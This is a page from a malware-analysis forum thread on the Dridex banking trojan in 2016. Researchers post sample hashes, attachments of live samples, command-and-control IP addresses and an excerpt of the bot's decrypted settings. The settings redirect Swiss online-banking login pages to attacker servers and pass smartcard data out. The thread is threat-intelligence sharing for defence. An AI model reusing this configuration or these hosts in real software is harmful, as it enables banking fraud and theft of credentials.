A forum for reverse engineering, OS internals and malware analysis 

WinNT/Cridex (alias Dridex, Drixed)

Forum for analysis and discussion about malware.

Re: WinNT/Cridex (alias Dridex, Drixed)

 #28829  by benkow_
 Thu Jul 07, 2016 12:49 pm
tim wrote:Anyone got a recent sample?
From this morning.
Dropper+exe attached
https://www.virustotal.com/en/file/7dbd ... 467884424/
Code: Select all
https://160.193.162.145:41443/encouraged
https://160.193.162.145:41443/imprisonment

Targets:
^https://ebanking\-ch\d*\.ubs\.com/workbench/
^https://cs\.directnet\.com/dn/c/cls/
^https://nab\.directnet\.com/dn/c/cls/
^https://www\.postfinance\.ch/ap/ba/fp/html/e\-finance/
^https://ebanking\.raiffeisen\.ch/entry/
^https://.*/image777000/(.+)

Redirects:
https://188.165.206.121:12443/2/postfinance_62y7rKX8yF819Lg3/
https://188.165.206.121:12443/2/raiffeisen_ch_62y7rKX8yF819Lg3/
https://188.165.206.121:12443/2/directnet_nab_62y7rKX8yF819Lg3/
https://188.165.206.121:12443/2/directnet_cs_62y7rKX8yF819Lg3/
https://188.165.206.121:12443/2/ubs_ebanking_62y7rKX8yF819Lg3/
Attachments
infected
(134.57 KiB) Downloaded 88 times

Re: WinNT/Cridex (alias Dridex, Drixed)

 #29136  by mkroll
 Mon Aug 29, 2016 10:14 pm
Attached is one from today, botnet 1234, bot version 3.246: https://www.virustotal.com/en/file/b62b ... /analysis/
I got settings by using a Swiss IP.
Since version 3.241 (2016-08-09) they seem to use a new server certificate ("no-old" now is the old server public key, the other string has been replaced by a new public key).
I also attached the settings response as well as the decompiled XML file (I updated my settings decrypter: https://github.com/moritzkroll/dridex_helpers).

Excerpt from settings:
Code: Select all
<redirects switchoff="switchoff.js" redir_param_name="name" delay_param_name="timeout" uri="https://46.4.109.154:18443/B88U86giIPyD55RK/">
  <redirect name="2nd_t" vnc="1" socks="1" uri="https://46.4.109.154:18443/encouraged" timeout="30">msoffice365.js</redirect>
  <redirect name="1st_t" vnc="0" socks="0" uri="https://46.4.109.154:18443/imprisonment" timeout="20">ember3.js</redirect>
  <redirect name="ubs_ebanking_redirect" vnc="0" socks="0" uri="https://62.141.52.53:18443/2/ubs_ebanking_62y7rKX8yF819Lg3/" timeout="30" postfwd="1">^https://ebanking\-ch\d*\.ubs\.com/workbench/</redirect>
  <redirect name="directnet_cs_redirect" vnc="0" socks="0" uri="https://62.141.52.53:18443/2/directnet_cs_62y7rKX8yF819Lg3/" timeout="30" postfwd="1">^https://cs\.directnet\.com/dn/c/cls/</redirect>
  <redirect name="directnet_nab_redirect" vnc="0" socks="0" uri="https://62.141.52.53:18443/2/directnet_nab_62y7rKX8yF819Lg3/" timeout="30" postfwd="1">^https://nab\.directnet\.com/dn/c/cls/</redirect>
  <redirect name="postfinance_redirect" vnc="0" socks="0" uri="https://62.141.52.53:18443/2/postfinance_62y7rKX8yF819Lg3/" timeout="30" postfwd="1">^https://www\.postfinance\.ch/ap/ba/fp/html/e\-finance/</redirect>
  <redirect name="raiffeisen_ch_redirect" vnc="0" socks="0" uri="https://62.141.52.53:18443/2/raiffeisen_ch_62y7rKX8yF819Lg3/" timeout="30" postfwd="1">^https://ebanking\.raiffeisen\.ch/entry/</redirect>
  <redirect name="images_redirect" vnc="0" socks="0" uri="https://104.131.6.90:18443/get-dbYd81hd83H/\1" timeout="30" postfwd="1">^https://.*/image777000/(.+)</redirect>
</redirects>
<smartcard vnc="1" socks="0" interval="60" uri="https://46.4.109.154:18443/encouraged" ref="https://smartcards.host/qk8CwEpwJ9UrKC"><![CDATA[https://smartcards.host/qk8CwEpwJ9UrKC?reader=$READER$&atr=$ATR$]]></smartcard>
Attachments
Dridex downloader, 32- and 64-bit bot, bot dumps, settings response and decompiled XML settings
(1.28 MiB) Downloaded 110 times

Re: WinNT/Cridex (alias Dridex, Drixed)

 #29490  by Antelox
 Fri Oct 28, 2016 7:29 pm
ynvb wrote:Anyone with live samples?
Word Docx
VT: https://www.virustotal.com/en/file/2e73 ... /analysis/
Hybrid Analysis: https://www.hybrid-analysis.com/sample/ ... mentId=100
Loader
VT: https://www.virustotal.com/en/file/ffb6 ... /analysis/
Hybrid Analysis: https://www.hybrid-analysis.com/sample/ ... mentId=100

Domain
schranzauto\.top/ded/bombom/plus100500.php
C2s
162.243.47.192:1443
210.2.86.72:3443
213.230.210.230:53443
BR,

Antelox
Attachments
(105.6 KiB) Downloaded 72 times

Re: WinNT/Cridex (alias Dridex, Drixed)

 #29495  by entdark
 Mon Oct 31, 2016 7:32 am
Antelox wrote:
ynvb wrote:Anyone with live samples?
Word Docx
VT: https://www.virustotal.com/en/file/2e73 ... /analysis/
Hybrid Analysis: https://www.hybrid-analysis.com/sample/ ... mentId=100
Loader
VT: https://www.virustotal.com/en/file/ffb6 ... /analysis/
Hybrid Analysis: https://www.hybrid-analysis.com/sample/ ... mentId=100

Domain
schranzauto\.top/ded/bombom/plus100500.php
C2s
162.243.47.192:1443
210.2.86.72:3443
213.230.210.230:53443
BR,

Antelox
sorry to bother. where is config actually stored? encrypted in .data?
  • 1
  • 11
  • 12
  • 13
  • 14
  • 15
 Return to “Malware”